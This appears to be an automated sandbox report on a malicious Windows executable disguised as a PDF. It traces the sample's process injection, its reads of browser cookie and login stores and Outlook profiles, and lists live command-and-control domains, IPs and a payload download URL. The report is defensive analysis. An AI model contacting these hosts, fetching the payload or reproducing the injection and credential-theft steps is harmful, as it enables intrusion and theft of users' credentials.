                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: NULL target: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe protection: read write
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: NULL target: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\recover.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\recover.exe | Thread register set: target process: 1360
                Source: C:\Windows\SysWOW64\recover.exe | Thread APC queued: target process: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B75008
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B38C93 LogonUserW
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00AE3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00AE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B44EF5 mouse_event
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SC_TR11670000_pdf.exe"
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | Process created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"
                Source: C:\Windows\SysWOW64\recover.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B44C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: SC_TR11670000_pdf.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: SC_TR11670000_pdf.exe, oCCZhsVsNwIIN.exe, 00000002.00000002.4204728931.0000000001741000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000000.1840307551.0000000001740000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000000.1993242708.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: oCCZhsVsNwIIN.exe, 00000002.00000002.4204728931.0000000001741000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000000.1840307551.0000000001740000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000000.1993242708.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: oCCZhsVsNwIIN.exe, 00000002.00000002.4204728931.0000000001741000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000000.1840307551.0000000001740000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000000.1993242708.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: oCCZhsVsNwIIN.exe, 00000002.00000002.4204728931.0000000001741000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000002.00000000.1840307551.0000000001740000.00000002.00000001.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000000.1993242708.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B0886B cpuid
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B150D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B22230 GetUserNameW
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B1418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00AE4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\recover.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\recover.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\recover.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\recover.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\recover.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\recover.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\recover.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\recover.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\recover.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: SC_TR11670000_pdf.exe | Binary or memory string: WIN_81
Source: SC_TR11670000_pdf.exe | Binary or memory string: WIN_XP
Source: SC_TR11670000_pdf.exe | Binary or memory string: WIN_XPe
Source: SC_TR11670000_pdf.exe | Binary or memory string: WIN_VISTA
Source: SC_TR11670000_pdf.exe | Binary or memory string: WIN_7
Source: SC_TR11670000_pdf.exe | Binary or memory string: WIN_8
Source: SC_TR11670000_pdf.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B56596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00B56596
Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B56A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B56A5A
MITRE ATT&CK Matrix (a number in front of a technique is the count of matched signatures mapped to it)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1574654 | Sample: SC_TR11670000_pdf.exe | Startdate: 13/12/2024 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: www.tlcatlas.xyz; www.030002128.xyz (Performs DNS queries to domains with low reputation); 17 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 5 other signatures
  -> SC_TR11670000_pdf.exe (4) started
     Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
     -> svchost.exe started
        Signatures: Maps a DLL or memory area into another process
        -> oCCZhsVsNwIIN.exe injected
           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           -> recover.exe (13) started
              DNS/IP: 45.200.148.45 (ports 49836, 49886, 80), Africa-on-Cloud-ASZA, Seychelles
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
              -> oCCZhsVsNwIIN.exe injected
                 DNS/IP: stationseek.online 198.251.84.200 (ports 50034, 50035, 50036), PONYNETUS, United States; solarand.online 217.160.0.60 (ports 50038, 50039, 50040), ONEANDONE-ASBrauerstrasse48DE, Germany; 8 other IPs or domains
                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              -> firefox.exe started

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
SC_TR11670000_pdf.exe | 76% | ReversingLabs | Win32.Trojan.Strab |
SC_TR11670000_pdf.exe | 100% | Joe Sandbox ML | |

No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
http://www.030002059.xyz | 0% | Avira URL Cloud | safe |
http://45.200.148.45/dashboard/xl.exe& | 0% | Avira URL Cloud | safe |
http://www.030002059.xyz/er88/ | 0% | Avira URL Cloud | safe |
http://www.basicreviews.online/r67x/ | 0% | Avira URL Cloud | safe |
http://45.200.148.45/dashboard/xl.exe | 100% | Avira URL Cloud | malware |
http://www.sortcouponspot.shop/90oi/ | 0% | Avira URL Cloud | safe |
http://www.tenmyk.shop/irzc/ | 0% | Avira URL Cloud | safe |
http://www.030002128.xyz/fc2m/ | 0% | Avira URL Cloud | safe |
http://www.stationseek.online/3qlo/ | 0% | Avira URL Cloud | safe |
http://www.tdassetmgt.info/d55l/ | 0% | Avira URL Cloud | safe |
http://www.tlcatlas.xyz/fhx4/ | 0% | Avira URL Cloud | safe |
http://www.quicktraze.website/0b3u/ | 0% | Avira URL Cloud | safe |
http://www.stationseek.online/3qlo?9B_ppt=T329z6mTpDO/RjmIsaX6GxS | 0% | Avira URL Cloud | safe |
http://www.solarand.online/tycs/ | 0% | Avira URL Cloud | safe |
http://www.idsmart.online/jbgy/?9B_ppt=WpM | 0% | Avira URL Cloud | safe |
http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYz | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
tlcatlas.xyz | 3.33.130.190 | true | true | | unknown
tdassetmgt.info | 3.33.130.190 | true | true | | unknown
solarand.online | 217.160.0.60 | true | true | | unknown
www.sortcouponspot.shop | 172.67.158.234 | true | true | | unknown
www.xphone.net | 13.248.169.48 | true | true | | unknown
basicreviews.online | 144.76.190.39 | true | true | | unknown
www.030002128.xyz | 161.97.142.144 | true | true | | unknown
www.quicktraze.website | 209.74.64.58 | true | true | | unknown
www.tenmyk.shop | 104.21.74.79 | true | true | | unknown
www.030002059.xyz | 161.97.142.144 | true | true | | unknown
www.idsmart.online | 15.204.67.7 | true | false | | unknown
stationseek.online | 198.251.84.200 | true | true | | unknown
www.salju777-rtp.click | 172.67.149.64 | true | true | | unknown
www.solarand.online | unknown | unknown | false | | unknown
www.stationseek.online | unknown | unknown | false | | unknown
www.89180.app | unknown | unknown | false | | unknown
www.tlcatlas.xyz | unknown | unknown | true | | unknown
www.tdassetmgt.info | unknown | unknown | false | | unknown
www.basicreviews.online | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
http://www.basicreviews.online/r67x/ | true | Avira URL Cloud: safe | unknown
http://www.030002128.xyz/fc2m/ | true | Avira URL Cloud: safe | unknown
http://www.sortcouponspot.shop/90oi/ | true | Avira URL Cloud: safe | unknown
http://www.tenmyk.shop/irzc/ | true | Avira URL Cloud: safe | unknown
http://45.200.148.45/dashboard/xl.exe | false | Avira URL Cloud: malware | unknown
http://www.stationseek.online/3qlo/ | true | Avira URL Cloud: safe | unknown
http://www.tdassetmgt.info/d55l/ | true | Avira URL Cloud: safe | unknown
http://www.030002059.xyz/er88/ | true | Avira URL Cloud: safe | unknown
http://www.tlcatlas.xyz/fhx4/ | true | Avira URL Cloud: safe | unknown
http://www.quicktraze.website/0b3u/ | true | Avira URL Cloud: safe | unknown
http://www.solarand.online/tycs/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://duckduckgo.com/chrome_newtab | recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.030002059.xyz | oCCZhsVsNwIIN.exe, 00000007.00000002.4206800241.0000000004C6E000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://45.200.148.45/dashboard/xl.exe& | recover.exe, 00000003.00000003.3092659925.0000000003371000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000003.00000002.4204450845.0000000003371000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.idsmart.online/jbgy/?9B_ppt=WpM | firefox.exe, 00000008.00000002.2219879934.0000000025054000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.stationseek.online/3qlo?9B_ppt=T329z6mTpDO/RjmIsaX6GxS | recover.exe, 00000003.00000002.4205854920.0000000005106000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000039C6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYz | recover.exe, 00000003.00000002.4205854920.0000000004DE2000.00000004.10000000.00040000.00000000.sdmp, oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.00000000036A2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | recover.exe, 00000003.00000002.4207941820.000000000832B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.strato.de | oCCZhsVsNwIIN.exe, 00000007.00000002.4205136401.0000000003B58000.00000004.00000001.00040000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
13.248.169.48 | www.xphone.net | United States | 16509 | AMAZON-02US | true
161.97.142.144 | www.030002128.xyz | United States | 51167 | CONTABODE | true
15.204.67.7 | www.idsmart.online | United States | 71 | HP-INTERNET-ASUS | false
45.200.148.45 | unknown | Seychelles | 328608 | Africa-on-Cloud-ASZA | false
172.67.158.234 | www.sortcouponspot.shop | United States | 13335 | CLOUDFLARENETUS | true
144.76.190.39 | basicreviews.online | Germany | 24940 | HETZNER-ASDE | true
209.74.64.58 | www.quicktraze.website | United States | 31744 | MULTIBAND-NEWHOPEUS | true
217.160.0.60 | solarand.online | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
3.33.130.190 | tlcatlas.xyz | United States | 8987 | AMAZONEXPANSIONGB | true
104.21.74.79 | www.tenmyk.shop | United States | 13335 | CLOUDFLARENETUS | true
198.251.84.200 | stationseek.online | United States | 53667 | PONYNETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574654
Start date and time: 2024-12-13 13:05:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SC_TR11670000_pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@15/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 59
• Number of non-executed functions: 270
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • VT rate limit hit for: SC_TR11670000_pdf.exe
Time | Type | Description
07:07:08 | API Interceptor | 11650950x Sleep call for process: recover.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.169.48 | RFQ_P.O.1212024.scr | malicious | FormBook | www.krshop.shop/5p01/
13.248.169.48 | SH8ZyOWNi2.exe | malicious | CMSBrute | sharewood.xyz/administrator/index.php
13.248.169.48 | MA-DS-2024-03 URGENT.exe | malicious | FormBook | www.snyp.shop/4nyz/
13.248.169.48 | Recibos.exe | malicious | FormBook | www.egyshare.xyz/lp5b/
13.248.169.48 | AWB_5771388044 Documente de expediere.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
13.248.169.48 | AWB_5771388044 Documente de expediere.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
13.248.169.48 | Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe | malicious | FormBook | www.hsa.world/09b7/
13.248.169.48 | MN1qo2qaJmEvXDP.exe | malicious | FormBook | www.lovel.shop/rxts/
13.248.169.48 | RFQ _ Virtue 054451000085.exe | malicious | FormBook | www.snyp.shop/4nyz/
